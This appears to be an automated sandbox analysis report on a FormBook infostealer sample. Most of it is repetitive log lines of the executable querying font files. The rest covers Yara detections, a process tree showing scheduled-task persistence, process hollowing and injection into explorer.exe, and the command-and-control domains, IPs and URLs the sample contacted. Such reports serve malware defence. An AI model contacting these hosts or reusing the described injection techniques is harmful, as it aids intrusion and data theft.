Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match File source: 00000006.00000002.702411674.0000000001AF0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.911335955.0000000000940000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.911866298.0000000002E00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.667772348.000000000436B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.701293612.0000000001780000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.700413913.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected FormBook
Source: Yara match File source: 00000006.00000002.702411674.0000000001AF0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.911335955.0000000000940000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.911866298.0000000002E00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.667772348.000000000436B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.701293612.0000000001780000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.700413913.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Behavior Graph (ID: 385317, Sample: YNzE2QUkvaTK7kd.exe, Startdate: 12/04/2021, Architecture: WINDOWS, Score: 100)

Start: DNS www.lsertsex.com; signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules), Found malware configuration, Malicious sample detected (through community Yara rule), 10 other signatures
  YNzE2QUkvaTK7kd.exe (started)
    dropped: C:\Users\user\AppData\...\VVhTSSmjNa.exe (PE32); C:\Users\...\VVhTSSmjNa.exe:Zone.Identifier (ASCII); C:\Users\user\AppData\Local\Temp\tmp27F.tmp (XML); C:\Users\user\...\YNzE2QUkvaTK7kd.exe.log (ASCII)
    signatures: Uses schtasks.exe or at.exe to add and modify task schedules; Writes to foreign memory regions; Allocates memory in foreign processes; Injects a PE file into a foreign processes
    RegSvcs.exe (started)
      signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; 2 other signatures
      explorer.exe (injected)
        network: www.realsults.com 154.203.184.76, 49746, 80 HKMTC-AS-APHONGKONGMegalayerTechnologyCoLimitedHK Seychelles; www.wfiboostrs.com 172.67.148.14, 49757, 80 CLOUDFLARENETUS United States; 192.168.2.1 unknown unknown
        signatures: System process connects to network (likely due to code injection or exploit); Uses ipconfig to lookup or modify the Windows network settings
        ipconfig.exe (started)
          signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
          cmd.exe (started)
            conhost.exe (started)
    schtasks.exe (started)
      conhost.exe (started)

Contacted Public IPs

IP              Domain              Country        ASN     ASN Name                                            Malicious
154.203.184.76  www.realsults.com   Seychelles     139646  HKMTC-AS-APHONGKONGMegalayerTechnologyCoLimitedHK   true
172.67.148.14   www.wfiboostrs.com  United States  13335   CLOUDFLARENETUS                                     true

Private

IP
192.168.2.1

Contacted Domains

Name IP Active
www.lsertsex.com 103.120.82.56 true
www.realsults.com 154.203.184.76 true
www.wfiboostrs.com 172.67.148.14 true

Contacted URLs

Name  Malicious  Antivirus Detection  Reputation
www.smarttel.management/msc/  true  Avira URL Cloud: safe  low
http://www.wfiboostrs.com/msc/?2d=Yn6xWrc8&6lXXDHeh=Vmyb2+dBHu0Fxfg/5qCzMPkyVQF1W5lD3/EJu1ZP6IBNOOXVlqQnUzqXVgG8rpdGNrLT  true  Avira URL Cloud: safe  unknown
http://www.realsults.com/msc/?2d=Yn6xWrc8&6lXXDHeh=SLnxv5WEj6Yhjlrb8B4FzKU74ag+VtkikWCAHb2VKlwGrAtgyss6rL13pKH+jHoocxko  true  Avira URL Cloud: safe  unknown